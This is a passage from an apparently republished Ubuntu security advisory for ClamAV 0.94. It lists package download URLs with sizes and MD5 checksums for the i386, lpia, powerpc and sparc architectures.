      Size/MD5:   253682 2dfbb18dbe45b97fe537e440c86079f0
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_i386.deb
      Size/MD5:   232686 f5fc69f35bb5206e6f3f1802eab27b87
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_i386.deb
      Size/MD5:   541856 cc9e3b0f262968372c5cdf8b62606280
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_i386.deb
      Size/MD5:   524410 2d1f9e712a3ef57c99434469a584f38d
    http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_i386.deb
      Size/MD5:   229260 280079fa42c8ff6a18a8fd1406956f3c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   232694 509ca94dd8ba239e70df349015eab8b6
    http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   866262 636afb92077246666719c22544dda5bd
    http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   253738 0581fb06ce78fd9a2d1e2d81cfa95e87
    http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   232232 7e301b68901a3435da4768b2845bf61d
    http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   543754 bd8453f227ae9bebcec4fb41b9e9d427
    http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   527060 b903aa2ec89a2b3c327e170f3b23e021
    http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_lpia.deb
      Size/MD5:   229286 d2af0a51fa4beb6eb3045f2dfa3abe9e

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   242896 a8a6f8ef5d43b0856cb250879b6d741d
    http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   903632 275eb13f4b9caa6ab4089aa0d8e97b24
    http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   258198 2109d15b9bcb4cedeb380ac295c26364
    http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   240246 c373dfb0ec6bd9539575aad28310a5ae
    http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   613886 8a59e0abf3597d1c13ffa47ee0700b48
    http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   554872 992aa23fb6ed82684c8325743e366947
    http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_powerpc.deb
      Size/MD5:   232832 36d93e39e3f1f74dde643bc78e38c4a7

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   232694 22f99a7b96cf3ab8749316cb3256b168
    http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   836388 a2eb3d95d9a6254db4d7375844f18f57
    http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   252954 b21baca5066e5e27a8b8154cc17b9d2c
    http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   233100 3c0b967b8a11e701698a1099a171ee82
    http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   577734 05eb85bfb1a2ac3b223eba160167c7e2
    http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   543454 09533df800dafec77af220c81897cb0e
    http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_sparc.deb
      Size/MD5:   230206 5abbd9810492e866183bb1033a284b18



© 1998-2025 E-Soft Inc. All rights reserved.